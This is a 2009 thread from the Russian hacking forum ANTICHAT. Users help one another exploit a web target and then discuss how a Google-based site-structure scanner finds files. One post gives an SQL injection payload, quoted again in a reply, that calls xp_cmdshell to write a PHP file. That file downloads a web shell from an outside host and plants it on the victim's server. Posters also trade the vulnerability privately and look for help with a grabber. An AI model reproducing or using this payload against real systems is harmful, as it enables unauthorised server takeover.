ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

13.06.2009, 00:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
diznt, а можно поконкретнее? Ты юзаешь багу? Если да, то там, скорее всего, стоят мэджики, которые ты никак не обойдешь.
|
|
|

13.06.2009, 00:34
|
|
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме: 3248203
Репутация:
628
|
|
Кто поможет дописать парсер\граббер ? почти всё написано ... точнее код был , но сейчас с донором что то не в порядке
контакты в пм или пишите в icq 45девять\девять3333 , +5 дам (:
|
|
|

13.06.2009, 00:40
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
diznt, а что тебе мешает просто вместо одинарных двойные поставить и код изменить? Кста, это вообще хз что, а не код echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>
Код:
'; USE Master exec xp_cmdshell '<? file_put_contents("shell.php",file_get_contents("http://bugaga.zapto.org/shell.txt")); ?>' > C:\AppServ\www\shell1.php';--
Кста, скинь свою аську и уязвимость в пм, плз
http://forum.antichat.ru/private.php?do=newpm&userid=59362
|
|
|

13.06.2009, 00:51
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Сообщение от mailbrush
diznt, а что тебе мешает просто вместо одинарных двойные поставить и код изменить? Кста, это вообще хз что, а не код echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>
Код:
'; USE Master exec xp_cmdshell '<? file_put_contents("shell.php",file_get_contents("http://bugaga.zapto.org/shell.txt")); ?>' > C:\AppServ\www\shell1.php';--
Кста, скинь свою аську и уязвимость в пм, плз
http://forum.antichat.ru/private.php?do=newpm&userid=59362
Спасибо попробую... А то я совсем забыл cmd команды 
|
|
|

13.06.2009, 03:29
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
На сайте madnet.name/tools/madss/
есть такая штука что забиваешь туда сайт а он тебе высвечивает нектрые файлы которые доступны для просмотра (думаю поняли мою мысль)
Так вот как интересует откуда он это берет? (точнее откуда грабит)
Последний раз редактировалось diznt; 13.06.2009 в 03:31..
|
|
|

13.06.2009, 13:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от diznt
На сайте madnet.name/tools/madss/
есть такая штука что забиваешь туда сайт а он тебе высвечивает нектрые файлы которые доступны для просмотра (думаю поняли мою мысль)
Так вот как интересует откуда он это берет? (точнее откуда грабит)
Данный сервис предназначен для определения структуры сайта. Часто приходится пользоватся различными сканнерами для определения структуры сайта, но мы забываем, что в 99% случаев до нас это сделал лучший сервис сети, великий и могучий GOOGLE, причем частенько он запоминает то, до чего смертному просто так не добраться. Моя система пытаетсы вытянуть максимум информации о сайте из гугла и построить на ее основе дерево сайта, утилита так же будет полезна web программистам для анализа индексации сайта гуглом.
Через гугл, но каким образом - это надо спросить у автора.
|
|
|

13.06.2009, 16:37
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Сообщение от mailbrush
Через гугл, но каким образом - это надо спросить у автора.
+цитата LEE_ROY
Как это?!
К примеру в гугле site:webxakep.net
И там будет выводиться странички форума и еще всякая фигня (webxakep.net/news/news-virus/print  age,1,891-dos.linux.-iisuxor.html,webxakep.net:8080/engine/editor/scripts/form_file.htm)
Хм... Ладно хорошо к примеру там он определяет что это страничка форума и не выводит но все равно там много линков которые он не высветил
Последний раз редактировалось diznt; 13.06.2009 в 16:41..
|
|
|

13.06.2009, 16:53
|
|
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
Провел на форуме: 1917742
Репутация:
541
|
|
Сообщение от diznt
+цитата LEE_ROY
Как это?!
К примеру в гугле site:webxakep.net
И там будет выводиться странички форума и еще всякая фигня (webxakep.net/news/news-virus/print  age,1,891-dos.linux.-iisuxor.html,webxakep.net:8080/engine/editor/scripts/form_file.htm)
Хм... Ладно хорошо к примеру там он определяет что это страничка форума и не выводит но все равно там много линков которые он не высветил
парсится первых к примеру 3 страницы, фильтруются на уники папки и файлы, после к запросу site:xakep.ru добавляется имя найденной папки - site:xakep.ru/user и тоже парсится 3 страницы. епты это же все можно понять просканив пару сайтов. 
|
|
|

13.06.2009, 03:38
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме: 110312
Репутация:
50
|
|
Из Google
|
|
|

13.06.2009, 03:38
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Сообщение от -JC-
Из Google
Подробнее
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|